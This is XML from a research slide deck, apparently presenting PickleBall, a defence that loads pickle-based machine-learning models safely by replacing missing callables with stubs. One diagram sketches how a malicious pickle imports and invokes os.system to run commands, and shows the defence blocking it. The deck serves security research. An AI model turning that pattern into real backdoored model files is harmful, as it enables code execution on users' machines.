                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>When a missing callable is imported, PickleBall creates a stub object and defers raising a security exception until the stub object is </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>invoked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Intuition: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>some attributes are added to the model as metadata after instantiation. If these are not used during deserialization or inference, they do not need to be instantiated.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1298" name="Google Shape;1298;p101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5357000" y="838675"/>
            <a:ext cx="3515400" cy="525600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Enforcement module is a modified Pickle Machine</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1299" name="Google Shape;1299;p101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5357000" y="1513850"/>
            <a:ext cx="3515400" cy="525600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Enforces policies </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>lazily</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> to account for </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>missing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> but </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>unimportant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> callables</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1300" name="Google Shape;1300;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010175" y="2615475"/>
            <a:ext cx="2005500" cy="738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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>import GradDescent</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>import os.system</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>invoke os.system</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1301" name="Google Shape;1301;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7312775" y="2252725"/>
            <a:ext cx="2005500" cy="554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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Stub(“GradDescent”)</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Stub(“os.system”)</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1302" name="Google Shape;1302;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7312775" y="3395725"/>
            <a:ext cx="2005500" cy="554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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Stub(“os.system”)</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>CANNOT BE INVOKED</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>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4" name="Shape 414"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="415" name="Google Shape;415;p35"/>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416" name="Google Shape;416;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Attackers Abuse Pickle-Based Models</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417" name="Google Shape;417;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="605975" y="1197500"/>
            <a:ext cx="3408600" cy="1693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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Models are saved and loaded with </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>serialization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>formats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Attackers abuse the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>pickle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> format to create backdoored models. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>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1" name="Shape 421"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="422" name="Google Shape;422;p36"/>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423" name="Google Shape;423;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Attackers Abuse Pickle-Based Models</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="424" name="Google Shape;424;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="605975" y="1197500"/>
            <a:ext cx="3408600" cy="1693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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Models are saved and loaded with </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>serialization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>formats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Attackers abuse the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>pickle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> format to create backdoored models. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="425" name="Google Shape;425;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4229250" y="929350"/>
            <a:ext cx="4171275" cy="1556525"/>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Columbia SEAS">
  <a:themeElements>
    <a:clrScheme name="Cornell ">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="44546A"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E7E6E6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="002356"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="FEB811"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="AE0F26"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="C4D600"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="998B82"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="AAA9AC"/>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